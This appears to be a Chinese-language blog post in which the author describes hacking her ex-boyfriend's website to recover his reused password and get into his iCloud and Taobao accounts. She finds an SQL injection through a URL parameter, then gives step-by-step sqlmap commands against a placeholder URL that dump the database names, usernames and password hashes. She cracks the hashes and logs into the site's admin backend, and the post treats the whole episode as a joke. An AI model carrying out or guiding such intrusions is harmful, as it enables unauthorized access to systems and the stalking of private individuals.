黑了前男友網站:從找SQL注入到后臺權限
責編:admin |2014-07-24 12:45:01此事可以作為姐妹們查崗查哨或者學習的論文普及,題目我已經想好了——論女友的重要性 or 前女友是顆不定時炸彈
其實事情很簡單,就是我閑得天靈蓋兒疼(蛋疼是男銀的事兒!),想知道前男友icloud以及淘寶的密碼,看看有木有跟老娘我這么如花似玉打著探照燈都找不到的善良純情小少女分手后的候補妹紙的照片。因為他的習慣是密碼通用,這樣順便還能看一些八卦的東西來提升娛樂精神,給炎炎夏日送來一陣略爽的清涼……嗚哈!心飛揚!(以前看到淘寶回收站里有啥飛機杯之類的,不忍直視的郁悶啊,喝水就喝水嘛,同是杯子家族的為毛還要分出來保溫杯、馬克杯、飛機杯?這不是可恥的搞分裂么?!)
安全小提示:盡量不要用通用密碼,老大關于隱私的文章里提到過很多次
廢話不多說了,節省口水資源,工作正大光明的在朗朗乾坤下開始展開了……
試過以前用的密碼以及模式重組,果斷已改,于是我有個迂回的思路,記得前男友管理過一個網站,于是打算從網站入手,看看是否能碰巧找到這個通用密碼
1. 第一次找SQL注入漏洞啊 原來是這樣找的:
通過在URL數字參數后面加單引號看頁面是否報錯,判斷是否存在注入,運氣很好,加了單引號后,頁面已經報錯了,如上圖。
判斷注入手段:
http://www.xxx.com/xxx.php?cid=118’
2. 工具驗證注射點:
用了同事教我的sqlmap來驗證注射點,果然很好用
Sqlmap驗證:
Sqlmap.py
–u “http://www.xxx.com/xxx.php?cid=118” –p cpid
3. 然后得到數據庫名:cn397073:
Sqlmap注射出數據庫名:
Sqlmap.py
–u “http://www.xxx.com/xxx.php?cid=118” –p cpid –dbs
4. 然后注射出所有用戶名:
有點小激動,但是找了下沒找到跟他相關的用戶名,難道不上了?不過看到了最后一個是熟人的名稱縮寫,雖然沒什么用,但好奇也記下了。
Sqlmap注射出庫內所有用戶名(表名不常見,用了其他辦法找到的,不表):
Sqlmap.py
–u “http://www.xxx.com/xxx.php?cid=118” –p cpid –D cn397073 –T xxx –C
username –dump
5. 不管有沒有用 都到這步了,先注射出密碼進去看看:
Sqlmap注射出庫內所有密碼hash:
Sqlmap.py
–u “http://www.xxx.com/xxx.php?cid=118” –p cpid –D cn397073 –T xxx –C
password –dump
6. 對密碼hash解密后得到明文,登陸后臺
看了下操作日志,時間習慣不像前男友,只好繼續觀察,另外后臺入口是在網站底部鏈接里發現的,弱~,后臺地址應該寫個特殊路徑,防止別人知道,顯然管理員為了方便自己放在了網站底部,不應該!
無聊之旅結束,沒搞破壞,沒做任何改動,沒得到有用信息,默默看過飄過,連在上邊插小紅旗這么賤賤而又光輝的事情都沒做,我太他表弟的高尚了!不夸自己品德都覺得對不起老大和團隊大牛們的教導!完了之后給管理員報個漏洞,老娘低調晉級偽小菜鳥白帽了~
不過看了下這些明文密碼,不得不感嘆沒一個有安全意識的呀,密碼幾乎都是名字or地名縮寫與數字的組合,如果是稍微認識的人都可以直接通過套密碼登陸進去,進而進一步的滲透。同志們以后都得注意,防患于未然……于未然……未然……然……然……